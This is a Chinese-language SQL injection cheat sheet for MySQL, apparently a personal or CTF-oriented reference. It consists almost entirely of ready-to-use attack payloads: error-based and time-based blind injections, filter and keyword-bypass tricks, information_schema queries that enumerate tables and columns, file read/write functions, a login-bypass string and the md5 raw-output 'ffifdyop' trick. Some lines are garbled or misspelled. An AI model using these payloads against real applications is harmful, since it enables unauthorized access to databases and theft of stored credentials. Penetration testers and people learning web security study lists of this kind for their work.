SQL注入cheatsheet
注入方法相关
Error Based
and (select 1 from (select count(*),concat((inject here),floor(rand(0)*2))x from information_schema.tables group by x)a)and 1=(updatexml(1,concat(0x5e24,(inject here),0x5e24),1))and extractvalue(1, concat(0x5c, (inject here)))
Time Based Blind
sleep(3)benchmark(10000000, sha1('true'))
过滤
空格过滤
- 注释代替空格
/**/ - 行注释回车替代空格(参见sqlmap tamper space2mysqldash)
- 其他符号代理空格
%20 %09 %0d %0b %0c %0d %a0 %0a - 括号过滤
()
逗号(,)过滤
使用join绕过:
1 | UNION SELECT 1,2,3,4 FROM ... |
1 | UNION SELECT * FROM ((SELECT 1)A JOIN (SELECT 2)B JOIN (SELECT 3)C JOIN (SELECT 4)D) |
引号(字符串)过滤
- 使用16进制
SELECT 0x61646D696E; - 使用CHAR函数
SELECT CHAR(97, 100, 109, 105, 110);
黑名单字符串
- 直接select
SELECT 'a' 'd' 'mi' 'n'; - 使用concat
SELECT CONCAT('a', 'd', 'm', 'i', 'n'); - 使用concat_ws
SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
关键词过滤
- 双写
- 随缘大小写
绕过
addslashes
Returns a string with backslashes added before characters that need to be escaped. These characters are:
- single quote (‘) ->\‘
double quote (“) -> \“
backslash (\) -> \\
NUL (the NUL byte) \0
宽字节注入
格式化字符串漏洞
常用变量、函数
user()database()version()@@datadir()concat()grop_concat()hex() unhex()load_file()SELECT OOXX INTO OUTFILE ''
字段位置备忘
表名
- raw
1
SELECT GOUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database();
- union
1
2
3UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* 列出当前数据库中的表 */
UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database(); /* 列出所有用户自定义数据库中的表 */
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql'; - blind
1
AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'
列名
1 | SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename' |
其他
万能密码
'=0#1
SELECT * FROM user WHERE username=''=0#';
php
php中md5($password, true)的漏洞利用
1 | SELECT * FROM user WHERE username=`admin` and password=md5($password, true) |
password:ffifdyop
md5之后的字符串'or'6<trash>
